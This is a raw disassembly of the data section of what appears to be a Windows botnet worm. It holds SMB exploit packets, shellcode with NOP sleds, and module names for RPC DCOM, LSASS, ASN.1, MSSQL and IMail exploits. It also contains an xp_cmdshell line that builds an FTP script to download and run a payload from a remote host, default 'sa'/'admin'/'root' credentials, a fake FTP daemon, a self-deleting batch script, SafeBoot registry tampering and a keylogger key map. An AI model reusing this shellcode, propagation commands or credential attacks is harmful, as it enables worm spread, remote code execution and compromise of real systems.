aAnman2_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12 db ' LM 0.12',0
align 4
dword_4024E4 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: code:00406251�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_402590 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: code:0040628D�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_402670 dd 54000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_405D60+8C�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_405D60+BB�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_4026D4 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_405D60+2AB�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_402740 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_405D60+2DD�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_4027E4 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_405D60+3D2�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_402864 dd offset byte_401495 ; DATA XREF: sub_405D60+400�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_4028F8 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_405D60+31A�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_402964 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_405D60+345�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_4029D8 dd 0 dd offset word_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 2 dup(0)
dword_402A60 dd 1004600h dd 7515123Ch, 751C123Ch
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_40661D+B2�o
align 4
dword_402A78 dd 10FF8h, 0 dword_402A80 dd 10FF8h dword_402A84 dd 7FFDF020h, 0 dword_402A8C dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) dd 13370000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002_0 db 'LM1.2X002',0
dw 4C02h
aAnman2_1_0 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12_0 db ' LM 0.12',0
align 4
dword_402B14 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_402B44 dd 0 dd 800000D4h, 0
unk_402B50 db 81h ; ; DATA XREF: sub_406B21+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 0
aSvwfbA db 'SVWf',0 ; DATA XREF: code:00406BD9�o
aIcsa db '',0
db 2 dup(0), 0FFh
dd 12096836h, 0F7E863D6h, 89000000h, 0A2E80846h, 0FF000000h
dd 6B680476h, 0E8CA2BD0h, 0E2h, 0E80C4689h, 3Fh, 680476FFh
dd 4C0297FAh, 0CDE8h, 68DB3100h, 410h, 89D0FF53h, 768B56C3h
dd 0B9C78910h, 410h, 315EA4F3h, 505050C0h, 0FF505053h
dd 468B0C56h, 0C4816608h, 5E5F0080h, 60E0FF5Bh, 23E8h
dd 24448B00h, 7C588D0Ch, 53C4383h, 284381h, 81000010h
dd 0F0002863h, 48BFFFFh, 14C48324h, 0C3C03150h, 0FF64D231h
dd 22896432h, 90B8DB31h, 31429042h, 8902B1C9h, 74AFF3DFh
dd 0F3EB4303h, 64107E89h, 6158028Fh, 20BF60C3h, 8B7FFDF0h
dd 8468B1Fh, 7F8B0789h, 78C781F8h, 89000001h, 741939F9h
dd 0EB098B04h, 39FA89F8h, 574045Ah, 0EB04528Bh, 891189F6h
dd 43C6044Ah, 0C36101FDh, 0FDF00CA1h, 1C408B7Fh, 8908588Bh
dd 8B008B1Eh, 46890840h, 8B60C304h, 8B28246Ch, 548B3C45h
dd 0EA017805h, 8B184A8Bh, 0EB01205Ah, 8B4938E3h, 0EE018B34h
dd 0C031FF31h, 0E038ACFCh, 0CFC10774h, 0EBC7010Dh, 247C3BF4h
dd 8BE17524h, 0EB01245Ah, 4B0C8B66h, 11C5A8Bh, 8B048BEBh
dd 4489E801h, 0C2611C24h, 0FEEB0008h, 0
dword_402D04 dd 6EB06EBh, 0 aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_405D60+5C�o
align 4
dword_402D18 dd 1CEC8166h dword_402D1C dd 0E4FF07h dword_402D20 dd 23h dword_402D24 dd 60h dword_402D28 dd 62B0606h, 2050501h, 0A0hdword_402D34 dd 30h dword_402D38 dd 0A1h dword_402D3C dd 3 aCccc db 'CCCC',0 ; DATA XREF: sub_40661D+153�o
; code:00406DAB�o
align 4
dword_402D48 dd 909006EBh, 90909090h, 0dword_402D54 dd 34000112h, 0 dd 150000h, 1B000106h, 20100h, 30C001Ch, 4002800h, 20008FFh
dd 10h, 0
dword_402D7C dd 42B68ABAh dword_402D80 dd 42D01E50h dword_402D84 dd 42B48774h dword_402D88 dd 7FFDE0CCh dword_402D8C dd 90909004h, 17h dup(90909090h), 0B0C9DC90h, 90909042h
; DATA XREF: code:004070E2�o
dd 0EB909090h, 0AE700108h, 0AE700142h, 42h
dword_402E04 dd 12400h, 0 a3333 db '3333',0 ; DATA XREF: code:00406DF3�o
align 4
aEu4 db 1Bh,'4',0 ; DATA XREF: code:00406D99�o
align 4
asc_402E1C: ; DATA XREF: code:00406CBE�o
dw 0Dh
unicode 0, <>,0
a512 db '512',0 ; DATA XREF: code:00406FDD�o
aIiii db 'ii',0 ; DATA XREF: code:00406FA6�o
align 4
aH888r db 'h:888',0 ; DATA XREF: code:00406F82�o
align 4
aR db '/\r',0Ah ; DATA XREF: code:00406EC0�o
; code:0040704B�o
db ':',0
align 4
aExecMaster___0 db 'EXEC master..xp_cmdshell ',27h,'del %s &%s &call %s',27h,0
; DATA XREF: code:004072ED�o
align 4
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell ',27h,'echo open %s %d >> %s &echo user %s '
; DATA XREF: code:004072A6�o
db '%s >> %s &echo get %s >> %s &echo quit >> %s &ftp -n -s:%s',0Dh,0Ah
db 27h,0
aS_txt db '%s.txt',0 ; DATA XREF: code:00407243�o
align 10h
aDriverSqlServe db 'DRIVER={SQL Server};SERVER=%s;UID=sa;PWD=%s;%s',0
; DATA XREF: code:004071E9�o
align 10h
aAdmin db 'admin',0 ; DATA XREF: code:0040715D�o
align 4
aRoot db 'root',0 ; DATA XREF: code:00407156�o
align 10h
aSa db 'sa',0 ; DATA XREF: code:0040714B�o
align 8
dword_402F38 dd 6D6F6364h dd 353331h, 3 dup(0)
off_402F4C dd offset aRpcdcom_c ; DATA XREF: sub_404360+723�r
; code:00407A96�r
; "rpcdcom.c"
dword_402F50 dd 87h ; sub_404360+440�r ...
off_402F54 dd offset loc_405391 ; DATA XREF: code:00407690�r
dword_402F58 dd 0 ; sub_404360+7CE�r ...
dword_402F5C dd 1 ; code:0040569E�r ...
byte_402F60 db 1 ; DATA XREF: code:00407670�r
align 4
aRpc135 db 'rpc135',0
align 4
dd 3 dup(0)
dd offset aRpcss_c ; "rpcss.c"
dd 87h, 40567Eh, 0
dd 2, 1, 7361736Ch, 35333173h, 3 dup(0)
dd offset aLsassrpc_c ; "lsassrpc.c"
dd 87h, 4061ACh, 0
dd 3, 1, 346E7361h, 3534h, 3 dup(0)
dd offset aAsn_c ; "asn.c"
dd 1BDh, 406B73h, 0
dd 4, 1, 316E7361h, 3933h, 3 dup(0)
dd offset aAsn_c ; "asn.c"
dd 8Bh, 406B73h, 0
dd 4, 1, 7173736Dh, 7361706Ch, 73h, 2 dup(0)
dd offset aMssqlpass_ftpd ; "mssqlpass.ftpd"
dd 599h, 407132h, 0
dd 5, 1, 7173736Dh, 6Ch, 3 dup(0)
dd offset aMssql_c ; "mssql.c"
dd 599h, 406CABh, 0
dd 6, 1, 7173736Dh, 3030326Ch, 30h, 2 dup(0)
dd offset aMssql2000_c ; "mssql2000.c"
dd 599h, 406EAFh, 0
dd 7, 1, 7173736Dh, 7064756Ch, 3 dup(0)
dd offset aMssqludp_c ; "mssqludp.c"
dd 599h, 40703Ah, 0
dd 8, 1, 69616D69h, 6Ch, 3 dup(0)
dd offset aImail_c ; "imail.c"
dd 8Fh, 4059C1h, 0
dd 0Ah, 1, 0Bh dup(0)
aImail_c db 'imail.c',0 ; DATA XREF: code:004030D8�o
aMssqludp_c db 'mssqludp.c',0 ; DATA XREF: code:004030AC�o
align 10h
aMssql2000_c db 'mssql2000.c',0 ; DATA XREF: code:00403080�o
aMssql_c db 'mssql.c',0 ; DATA XREF: code:00403054�o
aMssqlpass_ftpd db 'mssqlpass.ftpd',0 ; DATA XREF: code:00403028�o
align 4
aAsn_c db 'asn.c',0 ; DATA XREF: code:00402FD0�o
; code:00402FFC�o
align 4
aLsassrpc_c db 'lsassrpc.c',0 ; DATA XREF: code:00402FA4�o
align 4
aRpcss_c db 'rpcss.c',0 ; DATA XREF: code:00402F78�o
aRpcdcom_c db 'rpcdcom.c',0 ; DATA XREF: code:off_402F4C�o
align 4
dword_40317C dd 56495250h, 2047534Dh, 3A207325h, 3430032Dh, 61637302h
; DATA XREF: code:00407718�o
dd 72656E6Eh, 202D0203h, 6E65706Fh, 726F7020h, 6F662074h
dd 3A646E75h, 30032D20h, 73250233h, 364253Ah, 28202D02h
dd 65726874h, 203A6461h, 0D296425h, 0Ah
dword_4031C8 dd 56495250h, 2047534Dh, 3A207325h, 6E616353h, 676E696Eh
; DATA XREF: code:0040753E�o
dd 32D203Ah, 25023330h, 64253A73h, 202D0203h, 72687428h
dd 73646165h, 3003203Ah, 64250233h, 2D290203h, 6C656428h
dd 203A7961h, 2333003h, 2036425h, 6D282D29h, 74756E69h
dd 203A7365h, 2333003h, 2036425h, 6C282D29h, 6369676Fh
dd 61637320h, 3203A6Eh, 25023330h, 29020373h, 0A0Dh
aDisabled db 'disabled',0 ; DATA XREF: code:00407513�o
align 4
aEnabled db 'enabled',0 ; DATA XREF: code:00407508�o
byte_403254 db 0A2h ; DATA XREF: sub_40785C+A2�r
; sub_40785C+CE�w
align 4
dword_403258 dd 4113E68Bh ; sub_40785C+8F�w
dword_40325C dd 0B915EBh, 81000000h, 0F1h, 74805E00h, 0E200FF31h, 0E805EBF9h
; DATA XREF: sub_40785C+1A�o
dd 0FFFFFFE6h, 0
dword_40327C dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8408BADh, 33685353h
; DATA XREF: sub_4077DF+17�o
dd 68000032h, 5F327377h, 747268h, 736D6800h, 34E86376h
dd 1000000h, 35000000h, 74D60862h, 0C0942023h, 0B9CAC999h
dd 0B969155Ch, 0D740F640h, 850DB302h, 9CC44DF9h, 8318041Ah
dd 0C01AD301h, 80071302h, 0B4070334h, 5D28398Ah, 8B5B026Ah
dd 8B5353F8h, 548B3C57h, 0D703783Ah, 20528B52h, 0DB33D703h
dd 9A348B43h, 0C933F703h, 0C1C832ACh, 84AC05C1h, 8BF675C0h
dd 4C2B0075h, 0E47500B5h, 8B243487h, 0D7032456h, 5A0C8B66h
dd 31C568Bh, 8A048BD7h, 895EC703h, 0FF00B544h, 4B5B0045h
dd 835BB075h, 0FF5402C3h, 0C4830855h, 75C08508h, 2B02B49Eh
dd 54C48AE0h, 1C55FF50h, 685050h, 68000000h, 2, 6A50FC8Bh
dd 0FF026A01h, 0D88B2055h, 5357106Ah, 852455FFh, 0C75975C0h
dd 45h, 6A500000h, 0FF535504h, 0F48B2C55h, 770045C7h, 68000062h
dd 657865h, 68h, 55FC8B2Eh, 0C55FF57h, 6A004589h, 2006800h
dd 53560000h, 852855FFh, 781174C0h, 75FF1Bh, 56016A50h
dd 831055FFh, 0DFEB10C4h, 0FF0075FFh, 54501455h, 1855FF57h
dd 3055FF53h, 455FFh
dword_4033D0 dd 56495250h, 2047534Dh, 3A207325h, 3430032Dh, 3732502h
; DATA XREF: code:00407AA2�o
dd 25202D02h, 65202E64h, 6F6C7078h, 64657469h, 30032820h
dd 73250233h, 20290203h, 33300328h, 3732502h, 73202902h
dd 65636375h, 6C756673h, 0A0D796Ch, 0
dword_40341C dd 6272h ; code:00407C58�o ...
aUnknown db 'unknown',0 ; DATA XREF: code:004079C2�o
aShellcodedaemo db 'ShellcodeDaemon',0 ; DATA XREF: code:00407ADC�o
; sub_409022+E0�o
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 21h, 2 dup(0)
aUuuu db '',0
align 10h
dd 5 dup(0)
dd 21h, 4, 2 dup(0)
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 10ACh, 1, 1094h, 90000h, 805h, 0
dword_403510 dd 805h, 410041h, 302E31h, 66396438h, 30346534h, 3330612Dh
; DATA XREF: code:00403544�o
dd 31312D64h, 382D6563h, 2D393666h, 30303830h, 30336533h
dd 62313530h, 0
dd offset dword_403510+0Ch
dword_403548 dd 4000500h, 7868746Bh, 0dword_403554 dd 56495250h, 2047534Dh, 3A207325h, 3430032Dh, 726F7702h
; DATA XREF: code:00407E7E�o
dd 6469726Dh, 66742E65h, 3647074h, 65202D02h, 6F6C7078h
dd 64657469h, 33300320h, 3732502h, 3282002h, 25023330h
dd 29020373h, 63757320h, 66736563h, 796C6C75h, 0A0Dh
aTftpdaemon db 'TFTPDaemon',0 ; DATA XREF: code:00407BE9�o
; sub_409022+F5�o
align 10h
a221Goodbye_ db '221 Goodbye.',0Ah,0 ; DATA XREF: text:0040854A�o
align 10h
aQuit db 'QUIT',0 ; DATA XREF: text:00408536�o
align 4
dword_4035C8 dd 56495250h, 2047534Dh, 3A207325h, 3430032Dh, 70746602h
; DATA XREF: text:0040850B�o
dd 2D020364h, 2E642520h, 6E657320h, 75732064h, 65656363h
dd 6F742064h, 30032820h, 73250233h, 20290203h, 33300328h
dd 3732502h, 0A0D2902h, 0
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0 ; DATA XREF: text:004084CE�o
; text:00408529�o
align 4
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: text:004084C5�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: text:00408495�o
align 4
aRetr db 'RETR',0 ; DATA XREF: text:0040847D�o
align 10h
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: text:0040846D�o
align 10h
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: text:00408451�o
aXX db '%x%x',0Ah,0 ; DATA XREF: text:0040841F�o
align 4
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: text:004083D8�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: text:0040839F�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: text:0040838F�o
align 4
aList db 'LIST',0 ; DATA XREF: text:0040837B�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: text:0040836B�o
align 10h
aPasv db 'PASV',0 ; DATA XREF: text:00408357�o
align 4
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: text:00408347�o
aI: ; DATA XREF: text:00408333�o
unicode 0, <I>,0
aA_0: ; DATA XREF: text:0040831C�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: text:00408305�o
align 4
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: text:004082F5�o
align 4
aPwd db 'PWD',0 ; DATA XREF: text:004082E1�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: text:004082D1�o
align 4
aRest db 'REST',0 ; DATA XREF: text:004082BD�o
align 4
a215UnixTypeL8 db '215 UNIX Type: L8',0Ah,0 ; DATA XREF: text:004082AD�o
align 10h
aSyst db 'SYST',0 ; DATA XREF: text:00408299�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: text:00408289�o
align 10h
aPass db 'PASS',0 ; DATA XREF: text:00408275�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: text:00408265�o
align 10h
aUser db 'USER',0 ; DATA XREF: text:00408250�o
align 4
aSS db '%s %s',0 ; DATA XREF: text:0040823F�o
align 10h
a220Proftpd1_D_ db '220 ProFTPD 1.%d.%d Server (ProFTPD Default Installation)',0Ah,0
; DATA XREF: text:00408188�o
align 4
aFtpdaemon db 'FTPDaemon',0 ; DATA XREF: code:00407FB4�o
; text:004080D8�o ...
align 4
aHttp db 'http://',0 ; DATA XREF: sub_408691+B�o
aWb db 'wb',0 ; DATA XREF: sub_40870A+CF�o
align 4
aDetox db 'dETOX',0 ; DATA XREF: sub_40870A+63�o
align 4
aServicesactive db 'ServicesActive',0 ; DATA XREF: sub_408956+9�o
; sub_40899E+D�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_4089F7+11B�o
aService db 'Service',0 ; DATA XREF: sub_4089F7+D7�o
aMinimal db 'Minimal',0 ; DATA XREF: sub_4089F7+CB�o
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\SafeBoot\',0
; DATA XREF: sub_4089F7+B1�o
align 10h
aStart db 'Start',0 ; DATA XREF: sub_408B74+77�o
align 4
aSystemCurren_0 db 'SYSTEM\CurrentControlSet\Services\%s',0 ; DATA XREF: sub_408B74+3D�o
align 10h
aComspecCSSS db '%%comspec%% /c %s %s %s',0 ; DATA XREF: sub_408D7F+EA�o
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_408D7F+71�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db ':repeat2',0Dh,0Ah
db 'del "%%2"',0Dh,0Ah
db 'if exist "%%2" goto repeat2',0Dh,0Ah,0
align 4
aSdestroy_cmd db '%sdestroy.cmd',0 ; DATA XREF: sub_408D7F+3D�o
align 4
asc_403978: ; DATA XREF: sub_408EAE+43�o
unicode 0, <\>,0
dword_40397C dd 0FFFFFFFFh ; sub_404E76+14�w ...
dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 18h, 1, 3 dup(0)
dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_40924C+55�o
align 10h
dw 8
unicode 0, <>,0
aB:
unicode 0, <b>,0
dd 62000000h, 2 dup(0)
dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h, 38h, 38000000h, 2 dup(0)
dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 2 dup(0)
dword_40418C dd 2333003h, 2036425h, 20732520h, 2333003h, 2036425h, 20732520h
; DATA XREF: sub_4093DC+D9�o
dd 2333003h, 2036425h, 732520h
aMinute db 'minute',0 ; DATA XREF: sub_4093DC+CE�o
align 4
aMinutes db 'minutes',0 ; DATA XREF: sub_4093DC+C7�o
aHour db 'hour',0 ; DATA XREF: sub_4093DC+BF�o
align 4
aHours db 'hours',0 ; DATA XREF: sub_4093DC+B8�o
align 10h
aDay db 'day',0 ; DATA XREF: sub_4093DC+B0�o
aDays db 'days',0 ; DATA XREF: sub_4093DC+A0�o
align 4
dword_4041DC dd 646E6957h, 2073776Fh, 2333003h, 2037325haD_DBuildD db ' [%d.%d Build %d]',0
align 10h
a??? db '???',0 ; DATA XREF: sub_4094D4:loc_40956A�o
a2003 db '2003',0 ; DATA XREF: sub_4094D4+8F�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_4094D4+85�o
align 10h
a2000 db '2000',0 ; DATA XREF: sub_4094D4+79�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_4094D4+65�o
align 4
a98 db '98',0 ; DATA XREF: sub_4094D4+59�o
align 10h
aNt db 'NT',0 ; DATA XREF: sub_4094D4+4D�o
align 4
a95 db '95',0 ; DATA XREF: sub_4094D4+3A�o
align 4
dword_404228 dd 3430032Dh, 73797302h, 206D6574h, 6F666E69h, 202D0203h
; DATA XREF: sub_40959B+52�o
dd 72207325h, 696E6E75h, 6620676Eh, 2520726Fh, 6E6F2073h
dd 534F2820h, 73252029h, 50432820h, 3202955h, 25023330h
dd 20020364h, 207A484Dh, 68746977h, 41522820h, 320294Dh
dd 25023330h, 64252F64h, 4D200203h, 42h
dword_404288 dd 72h aCCCCCCC db '%c%c%c%c%c%c%c',0 ; DATA XREF: sub_4097E5+C1�o
align 4
a0123456789abcd db '0123456789abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_4097E5+27�o
align 10h
flt_4042D0 dd 9.765625e-4 ; DATA XREF: sub_404360+2D2�r
